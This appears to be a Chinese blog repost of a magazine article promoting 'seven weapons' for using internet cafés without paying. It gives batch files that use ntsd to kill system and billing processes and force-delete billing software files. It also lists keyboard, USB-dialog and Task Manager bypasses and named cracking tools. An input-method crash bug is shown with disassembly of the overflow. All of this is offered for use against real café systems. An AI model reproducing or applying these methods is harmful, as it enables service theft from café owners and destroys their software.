各位同事门好,一个人不可能是完美的,电脑也不可能没有漏洞,下来讲下在网吧怎么做不发钱又简单,
就是3条命令,什么工具都不需要,
把它们做成一个批处理直接运行就可以啦!
ntsd -c q -pn smss.exe
ntsd -c q -pn winlogon.exe
ntsd -c q -pn clsmn.exe

先把上面的命令做成批处理吧!

批处理执行完后万象的程序就关闭啦,大家一定不要点任何的东西,点了以后计算机就会锁住屏幕跟没有登陆卡号是一样的,如果你鼠标不点到下面的那个万象图表,它也不会自动消失,这样大家就不用去做什么伪装啦,
   记注:万象的3个图标不能点哦~
嘿嘿 !
这样就可以啦,,计算机是不会关机的
就是你自己点关机都无所谓~~
                                                                     
              

orig_1.gif 网吧免费上网的7种武器

2006-03-10 19:04:21
 标签: 上网    [ 推送到技术圈]

本文已经发表在〈***X档案〉2005年9月刊
网络江湖风起云涌,江湖代代人才出,传闻,当年江湖人士借助各种手段,致使肉鸡漫天飞, 网吧免费上,着实令菜鸟们口水流了一地,大叹:生不逢时,技不如人,未遇名师,做事太难。
菜菜帮菜鸟堂堂主小行(本堂最菜的当选为堂主)行走江湖,寻找各个门派的免费上网密招,偶得七种武器,不敢独享,拿来与菜鸟们分享,同时希望老鸟们给予指正,综观各个网吧门派,为了限制其他门派纷纷使用各派的镇派之宝,如航母级的PIBWIN,神兵利器万象网管,宝物美萍网管大师,记费王,本文针对此4件宝物给予破解方法。
1.长生剑----键盘的SLEEP键和WAKE UP键`
出自:WINXP SP2
表演测试:WINXP SP2
当你在网吧上网的时候,当到时间后,机器都会被锁定,这个时候你可以按SLEEP键,(不要说,你不知道是那个健啊),然后你会发现显示器会逐渐的转化为待机状态,再按WAKE UP键,你仔细的盯着显示器,会看到屏幕慢慢清晰,计费系统就会消失掉了,锁定就被解除了,接下来不用我明说了吧,都知道怎么去做,那就是只要不被网管发现,想上多久,就上多久.
高人点评:计费系统可以限制用户的待机,注销权限,是通过屏蔽相关选项按纽的方法来实现的,但很多键盘可以通过按键设置直接调用系统的待机或休眠命令,饶开计费系统本身的限制,由于待机命令和计费系统有冲突,一旦进入了待机状态,计费系统也自然就失败了。
2.霸王枪---U盘
出自:WIN98系统
表演测试:WIN98系统
很多时候我们需要用U盘存储东西,插入U盘后,系统提示要安装相应的驱动程序,选择手动安装方式,通过查找驱动位置的浏览窗口,调用EXPLORER.EXE
进程,桌面就显示出来,这个时候计费系统就型同虚设了,另外现在手机功能越来越多,小菜我那天 拍了自己的照片拿去传到网上,系统是
2000系统,桌面安装的是逍遥游记费软件,杀毒软件安装的是瑞星,当我把数据线插入机器后,瑞星大叔马上很勤快的提示,发现可疑进程,提示的是发现了逍遥游进程,问我是不是查杀,我毫不客气的选择查杀,结果吗?是需要重新启动才可以发挥作用,而机器是还原精灵,我当时比较忙,就没有去破,但我想这个思路是可行的,那位大哥有条件的测试下吧。
高人点评:WIN98没有内置的
USB设备的驱动程序,因此才可以轻松的破解,至于为什么2000里,为什么瑞星会查杀,就有待研究了。
3.碧玉刀---三键客
CTRL+ALT+DEL组合键
出自:WINXP SP2
表演测试:WINXP SP2
计费系统在系统启动后加载,自动担任起向上网的会员收钱的重任,所以在计费系统加载前,用 CTRL+ALT+DEL组合键调出任务管理器,发现一个进程,杀掉一个进程,只要时间把握的好,大家破这个还是十分简单的 。大部分会把任务管理器功能给关闭,这个可以在百度里搜任务管理器解禁,很多的一搜就全出来了,这里我献上个不错的软件网吧辅助工具,有了它,什么任务管理器,硬件管理器,破起来那叫一个轻松.首先要在限制恢复里恢复所有限制并立即生效,见图1,接下来,就可以随便对那个任务管理器了,见下图怎么样是不是方便的很?

4 .拳头---干掉进程
BE.EXE (NORTON UTILITIES
8。0Z中一个文件,可以产生一个系统延时)
表演测试:
将计费系统的相关进程杀掉是最常用的手段,也是很好使的手段,无论是本地还是远程,这个都十分必要。
步骤一:找出计费系统的相关进程,用合法的帐户登陆计费系统,打开DOS窗口,输入TASKLIST 察看当前进程。
 
分析得知,PUBWIN.EXE为计费进程,RUN。EXE为监视进程,RECLOCK.EXE为截面锁定和权限限制 进程,尝试用TSKILL命令终止其中任一进程,发现均提示找不到该进程,看来只好请NTSL出山了。
步骤二:编写批处理文件
在计费系统中,一旦客户用账号登陆上机,服务端就会将该账号转为计费状态,即使客户 重起或终止计费进程,只要客户不执行下机命令,在服务端该账号就始终处在计费状态,因此要在下机后再执行相关命令,就要编写个批处理文件在后台运行,为了争取下机所需要的时间,要用到BE。EXE将他防到要创建的批处理文件同一目录,打开记事,输入一下内容(//中为标注,不必输入)
BE delay300 /让系统延时30秒,30秒后继续执行下面的内容/
ntsd -c q -p
PID1/ 利用NTSD 杀计费系统进程,PID1 为进程 RUND1L。EXE的ID /
ntsd -c q -p
PID2/PID2为进程RECLOCK。EXE的ID /
ntsd -c q -p PID3/PID3为进程RECLOCK。EXE的ID /
cd
C:PROGRAM
FILESHINTSOFTPUBCLT进入pubwin运行文件目录,此处以Pubwin的默认安装目录为例/
del/f/s/q*.*/删除与计费系统相关的全部运行文件/
del
C:WINDOWSsystem32RUND1L.exe保存该文件并命名c.bat
步骤三:
运行C.bat,账号注销下机,静静的等待30秒,计费系统被无情的杀掉了,虽然任务拦无法显示,
但并不影响使用。
5.离别钩---专杀工具
专杀工具的发明是应了一物降一物的规律,他们可以解除各种限制,更厉害的是可以终止计费系统 并且操作十分简单,目前的专杀工具有,《PUBWIN4幽灵》,《美萍安全卫士破解器》, 《万象网管专家破解器》等这里给大家介绍个工具,Pubwin4幽灵对付航母级的PIBWIN的十分管用, 可以点清除计费软件,这样就不会记费了,但是唯一不好的是清除后总是提示我,说这个是违法的行为,很烦.其他几个大家自己找下吧,我一直认为菜鸟学东西,百度是最好的老师,所以你只要你掌握了关键词查找,找点东西,还是比较容易的啊
.
6.多情环
---输入法漏洞
把输入法选中为智能ABC状态,这个时候在在网吧管理软件登陆口,你可以输入文字的地方,把光标移向那个地方,首先输入v,向上按下左箭头(移动任何一个方向键都可以) ,再按删除键 ,回车,后退键(有时要按二次后退键),然后立刻造成当前任何窗口进程死掉。关掉,重新来,就不记费了。一般系统只要这个BUG不被管理员处理掉,很多都是可以破的,不管是什么网吧管理软件,因为这是智能ABC输入法的BUG。
这里我做了下深化。用OD打开笔记本。然后切换输入法到智能ABC,输入v,左箭头,delete ,回车 (空格也可以)。然后立刻造成进程死掉,然后OD的信息会告诉你问题出7380****.而7380****属 于winabc.ime的地址。经过跟踪,确定出错指令为ImeToAsciiEx函数。开始不知此函数是干中的,于是 查了一下,此函数是用来处理输入的字符。每按一个键就会调用一次,当上面这个动作做完后又调用了 0x7380AC95函数。
OD显法的内容如下:
7380ACA1 |> 66:81FE 3D80 CMP
SI,803D
;si为你按的那个键的hex值
7380ACA6 |. 75 26 JNZ
SHORT WINABC.7380ACCE
7380ACA8 |. 803D B0298173
>CMP BYTE PTR DS:[738129B0],3 ;3为输入中间阶段
7380ACAF |. 0F84
E7010000 JE WINABC.7380AE9C
7380ACB5 |. 833D AC298173 >CMP DWORD PTR
DS:[738129AC],1
7380ACBC |. 0F8E DA010000 JLE WINABC.7380AE9C
7380ACC2 |.
C605 B0298173 >MOV BYTE PTR DS:[738129B0],1
7380ACC9 |. E9
CE010000 JMP WINABC.7380AE9C
关于0x7380AC95的代码
7380ADB4 |> 56 PUSH
ESI
7380ADB5 |. E8 58140000 CALL WINABC.7380C212
7380ADBA |.
85C0 TEST EAX,EAX
7380ADBC |. 74
20 JE SHORT WINABC.7380ADDE
7380ADBE |.
66:83FE 76 CMP
SI,76
; 与'v'比较
7380ADC2 |. C605 B0298173 >MOV BYTE PTR
DS:[738129B0],3
7380ADC9 |. 0F94C0 SETE
AL
; 不是的话al=0
7380ADCC |. A2 6C488173 MOV BYTE PTR
DS:[7381486C],AL ; 是v的话进入v输入状态
7380ADD1 |. E8
F6110000 CALL
WINABC.7380BFCC
7380ADD6 |.
391D CC558173 CMP DWORD PTR DS:[738155CC],EBX
7380ADDC |. EB
23 JMP SHORT WINABC.7380AE01
v的输入状态不同,比如Vabc 会输入abc英文,V1什么的为特殊字符和符号。
下面去找出问题的地方
7380AC81 |.
33DB XOR EBX,EBX
.......
7380AE08
|> 0FB7C6 MOVZX
EAX,SI
; Case 3 of switch 7380ACE2
7380AE0B |.
50 PUSH EAX
7380AE0C |. E8
340A0000 CALL WINABC.7380B845
7380AE11 |.
2BC3 SUB EAX,EBX
7380AE13 |. 74
26 JE SHORT WINABC.7380AE3B
.......
7380AE3B |> 381D 6C488173 CMP BYTE PTR
DS:[7381486C],BL ;DS:[7381486C]=2
7380AE41 |. 74
22 JE SHORT
WINABC.7380AE65
;没有发生跳转,正常情况下0x73811F52肯定大于0
 
7380AE43 |. 0FB705 521F817>MOVZX EAX,WORD PTR DS:[73811F52]
;DS:[73811F52]为0
7380AE4A |.
48 DEC
EAX
;FFFFFFFF
7380AE4B |. C605 CC758173 >MOV BYTE PTR
DS:[738175CC],2
7380AE52 |.
50 PUSH EAX
7380AE53 |. 68
561F8173 PUSH WINABC.73811F56
7380AE58 |. E8 FA140000
CALL WINABC.7380C357
7380AE5D |. 881D 6C488173 MOV BYTE PTR
DS:[7381486C],BL ;函数将发生错误
7380AE63 |. EB
31 JMP SHORT WINABC.7380AE96
如果del删去V,DS:[73811F52]变量为0,但是DS:[7381486C]=2没有变为0,仍然在输入中途状态,dec
eax是为了取得除了v之外的字母串的长度,结果这里变为 0xffffffff,7380AE5D |. 881D 6C488173 MOV
BYTE PTR
DS:[7381486C],BL 中 函数没有做检查。
7380C4C8 0FB745 10 MOVZX EAX,WORD PTR
SS:[EBP+10] ; eax =
0xffff
7380C4CC
8BC8 MOV
ECX,EAX
7380C4CE
8BFB MOV
EDI,EBX
7380C4D0 037B 58 ADD
EDI,DWORD PTR DS:[EBX+58]
7380C4D3
03F3 ADD
ESI,EBX
7380C4D5 8B75 0C MOV
ESI,DWORD PTR SS:[EBP+C]
7380C4D8
8BD1 MOV
EDX,ECX
7380C4DA C1E9 02 SHR
ECX,2
; ecx = 0x3fff
7380C4DD 8943
54 MOV DWORD PTR
DS:[EBX+54],EAX
7380C4E0
03C3 ADD
EAX,EBX
7380C4E2
F3:A5 REP MOVS DWORD PTR
ES:[EDI],DWORD PTR DS> ; 拷贝0x3fff个int
看到了吗,出错的地方。在这里溢出了。
还有这个问题
7380B416 /$ 803D C0558173 >CMP BYTE PTR
DS:[738155C0],0AA
7380B41D |.
56 PUSH ESI
7380B41E |. 74
2D JE SHORT WINABC.7380B44D
7380B420 |.
66:8B0D 545E81>MOV CX,WORD PTR
DS:[73815E54] ; cx = 0
7380B427 |.
66:49 DEC
CX
; cx = 0xffff
7380B429 |. 0FB7C1 MOVZX
EAX,CX
7380B42C |. 66:890D 545E81>MOV WORD PTR
DS:[73815E54],CX
7380B433 |. 0FB690 405E817>MOVZX EDX,BYTE PTR
DS:[EAX+73815E40]
7380B43A |. 0FB680 415E817>MOVZX EAX,BYTE PTR
DS:[EAX+73815E41]
注:
ds:0x73815E54表示当前输入栏中有多少字/词
DS:[738129B0]=0时上面的代码会被用到。当用退格消去输入栏中最后一个汉字时DS:[73815E54]=0,DS:[738129B0]应该变成3,表示进入输入状态.但是我们随便输入一个词,然后输入任意字符,按←,退格,回车,在输入框中得到前一词的默认字,然后连按两次退格。输入第一个退格键,DS:[73815E54]=1,可是DS:[738129B0]并没有变成3,再次按下退格键,函数又执行到这里,cx变为0xffff,就出错了。
因为程序可以导致IME所HOOK的进程退出。所以像万象那样的网吧管理软件会立刻出错而退出进程,这样你也就达到了免费上网的目的。
7.孔雀翎----美萍自带序列号漏洞
在本刊7月号上赵学通的 《破解美萍新招》上介绍过,这里就不详细说了。
几款武器的介绍,相信菜鸟们在网络的大江湖内定会有所收获,因为现在的大部分的网络管理员意识 还是很差,好了,心动不如行动,我就不多说了,要不都说我象唐僧了,最后提醒下,即使你可以
轻松的免费了,也必须悠着点,那样太免费多了,可是不好的啊,如果大家有什么问题,欢迎跟帖子留言,我会及时解答给大家的!

(网吧辅助工具V4,Pubwin4幽灵请自行下载)